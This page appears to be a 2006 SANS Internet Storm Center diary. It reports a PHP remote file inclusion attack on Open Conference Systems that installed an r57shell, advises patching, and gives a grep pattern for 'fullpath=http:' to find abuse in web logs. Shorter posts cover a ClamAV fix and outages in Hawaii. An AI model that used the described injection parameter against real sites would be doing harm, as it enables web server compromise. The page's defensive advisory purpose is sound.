Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2006-10-16 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Active exploit of Open Conference Systems web application

Published: 2006-10-16
Last Updated: 2006-10-16 23:09:04 UTC
by William Salusky (Version: 1)
0 comment(s)
We're looking into a host compromise reported by Mike, a diary reader.  Mike reported a PHP remote file inclusion attack against an Open Conference Systems web application used in his organization.  A modified r57shell php script was used to compromise the system.

A vulnerability disclosure for the Open Conference System was posted to BugTraq on Friday October 13th which mentions that version <= 1.1.3 are vulnerable.  Interestingly enough, the official software distribution site at http://pkp.sfu.ca/ocs_download/ states that all versions prior to version 1.1.6 are vulnerable.  Take a look at your respective environments to determine if you are running OCS software, and if you find it... Do I have to say it?  Patch.

The time between vulnerability disclosure and determined time of host compromise in this case was approximately 1.5 hours.  I can only speculate as to how many hosts have already or are yet to become phishing sites, spammer nodes, iframe exploit hosts or fall prey to any other manner of abuse due to this vulnerability.

If you do have OCS installed, a quick check for abuse could be indicated by the following command line statement.
 
grep "fullpath=http:" YourWebServerLogLocation.log

Handler on Duty
William Salusky
Keywords:
0 comment(s)

ClamAV fixes multiple vulnerabilities

Published: 2006-10-16
Last Updated: 2006-10-16 16:54:24 UTC
by William Salusky (Version: 1)
0 comment(s)
Multiple vulnerabilities have been fixed with the release of version 0.88.5 of the free and open-source ClamAV AntiVirus product related to the handling of PE files and the unpacking of CHM help files.  The PE handling issue poses a significant risk and users of versions prior to ClamAV 0.88.5 are urged to upgrade ASAP.

Optionally, and also of noteworthiness on the ClamAV site, is the availability of release candidate v0.90RC1.  You may want to consider testing out this new release of ClamAV software in addition to your security conscious software upgrade.

Handler on Duty
William Salusky


Keywords:
0 comment(s)

Hawaii connectivity

Published: 2006-10-16
Last Updated: 2006-10-16 01:17:32 UTC
by William Stearns (Version: 1)
0 comment(s)
After this morning's earthquake, we have reports of networks to or in Hawaii that are down, including www.hawaii.gov.  News about the incident can be found at:
http://www.thehawaiichannel.com/video/4324656/index.html ,
http://www.thehawaiichannel.com/news/index.html ,
http://www.cnn.com , and
http://the.honoluluadvertiser.com/article/2006/Oct/15/br/br9634517802.html .  We send our best wishes to the residents of Hawaii.  (Thanks to two readers for their help.)

Keywords:
0 comment(s)
Diary Archives